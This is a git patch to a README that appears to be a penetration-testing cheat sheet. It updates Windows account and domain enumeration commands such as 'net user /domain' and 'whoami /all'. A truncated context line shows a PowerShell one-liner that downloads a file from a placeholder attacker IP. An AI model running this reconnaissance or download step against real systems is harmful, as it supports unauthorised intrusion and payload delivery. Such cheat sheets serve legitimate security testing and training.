From 81aa628f66c48a1923735f99239c603ed6dd893d Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 1 Sep 2022 14:11:15 -0400 Subject: [PATCH] Update README.md --- README.md | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 495b4f2..518cc43 100644 --- a/README.md +++ b/README.md @@ -786,17 +786,23 @@ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRES # Windows Enumeration Commands # CMD -#Me -net users %username% -#All local users -net users -#Groups -net localgroup -#Who is inside Administrators group -net localgroup Administrators + #Check the privileges whoami /all +# Enumerate all local accounts +net user + +# Enumerate entire domain +net user /domain + +# Enumerate information about user +net user {USERNAME} /domain + +# Enumerate all groups in domain +net group /domain + + # PS Get-WmiObject -Class Win32_UserAccount Get-LocalUser | ft Name,Enabled,LastLogon